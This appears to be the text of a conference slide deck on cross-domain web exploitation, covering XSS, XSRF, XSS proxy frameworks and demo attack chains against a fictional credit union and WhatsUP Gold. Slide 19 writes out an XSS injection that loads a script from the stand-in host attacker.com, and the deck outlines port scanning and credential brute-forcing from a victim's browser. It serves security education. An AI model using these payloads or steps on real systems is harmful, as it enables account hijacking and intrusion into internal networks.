kicking down the cross domain door
play

Kicking Down the Cross Domain Door Techniques for Cross Domain - PowerPoint PPT Presentation

Kicking Down the Cross Domain Door Techniques for Cross Domain Exploitation Billy K Rios (BK) and Raghav Dube Tabbed Browsing Rich Content Mash-ups Cookies JSON Ajax Implication of Cross Domain Attacks Implication of Cross Domain Attacks


  1. Kicking Down the Cross Domain Door Techniques for Cross Domain Exploitation Billy K Rios (BK) and Raghav Dube

  2. Tabbed Browsing Rich Content Mash-ups Cookies JSON Ajax Implication of Cross Domain Attacks

  3. Implication of Cross Domain Attacks

  4. Attack Foundations Cross Site Scripting (XSS) • I njected Client Code • Cookie Stealing • Browser Hijacking • Web Page Defacement • Hawtness

  5. XSS Example / Demo Attack Foundations

  6. Attack Foundations Cross Site Request Forgery (XSRF) • Applications Trust • Parameters, Cookie, I P Space… • Authenticated Examples • New Hawtness

  7. XSRF Example / Demo Attack Foundations

  8. Attack Foundations XSS meets XSRF • Using XSS and XSRF together! • XSSXSSRFSSX? • Both Have Strengths • Both Have Weaknesses • One Armed Boxers

  9. XSS Proxies and Frameworks XSS Proxy Fundamentals • Anton Rager – XSS Proxy • BeEf, XSS Shell, Backframe • < script> alert(‘xss’)< / script> • < script src = …/ proxy.js> • Dynamic JavaScript Payloads • Frames and Control Channels

  10. XSS Proxies and Frameworks XS-Sniper • Typical XSS Proxy • Rendering of HTML • Organization of Data • JavaScript Payloads Provided • Source Code Snippets

  11. XSS Proxies and Frameworks Dynamic JavaScript Payload for execute.js Captured incoming HTTP requests to the XS-Sniper Proxy

  12. Dynamic JavaScript Payload for external.js

  13. XSS Proxies and Frameworks

  14. The Attack – The Initial XSS MyPercent20.com • Popular Social Networking/ Blogging Site • User Base of Tens of Thousands of Users • Allows Uploading of HTML and Other Content

  15. The Attack – BigCreditUnion.com BigCreditUnion.com • Typical Online Banking Website • Fictional Credit Union • Built-in Vulnerabilities for Demo

  16. BigCreditUnion Attacker MyPercent20 The Attack – BigCreditUnion.com I nternet The Victim

  17. The Attack – BigCreditUnion.com Assumptions • The victim has access to the I nternet • BigCreditUnion.com has an XSS exposure • The victim is using I E or Firefox

  18. The Attack – BigCreditUnion.com Steps to Exploitation • Target Reconnaissance • I nitial XSS • Jumping to BigCreditUnion • Authenticated Attacks • Unauthenticated Attacks

  19. parent.myFrame3.location.href= 'htt p://www.bigcreditunion.com/login.a sp?acctnum= "> < /td> < script%20sr c= http://www.attacker.com/test/ex ternal-spot.js?> < /script> < td> '; http://www.attacker.com/test/external-spot.js?test123 http://www.attacker.com/test/noresponse.js?test123

  20. The Attack – BigCreditUnion.com DEMO

  21. The Attack – WhatsUP Gold 2006 WhatsUP Gold 2006 • Made by I pswitch • Has Known XSS Vulnerabilities • Found on Corporate I ntranets • Not Limited to WhatsUP Gold • “Protected by Firewalls!”

  22. The Attack – WhatsUP Gold 2006

  23. The Attack – WhatsUP Gold 2006

  24. MyPercent20 Attacker The Attack – WhatsUP Gold 2006 I nternet The WhatsUP Victim Gold

  25. The Attack – WhatsUP Gold 2006 Assumptions • The management console is only available via the I ntranet • The victim will NOT be logged into the management console • The victim does NOT have a WhatsUP account • The victim is using Firefox (Possible with I E) • No unauthenticated XSS vulnerabilities

  26. The Attack – WhatsUP Gold 2006 Steps to Exploitation • Vulnerability Research • Target Reconnaissance • I nitial XSS • Port scanning and Fingerprinting • Brute Forcing Credentials • XSS follow-up • Driving I nteraction

  27. The Attack – WhatsUP Gold 2006 Creds List

  28. NOT LI MI TED TO WhatsUP Gold! The Attack – WhatsUP Gold 2006

  29. The Attack – WhatsUP Gold 2006 DEMO

  30. One More Time… This time in Slow motion WTF?

  31. Questions and Thanks… PEOPLE I ’ve MET PEOPLE I haven’t MET Danya Nitesh Dhanjani Jeremiah Grossman Rajat Swarup RSnake Sriram Anton Rager Mike Crabtree SPI Dynamics Old PAC-CERT Crew Black Hat Ed Souza Houston & New York Advanced Security Centers!

Recommend


More recommend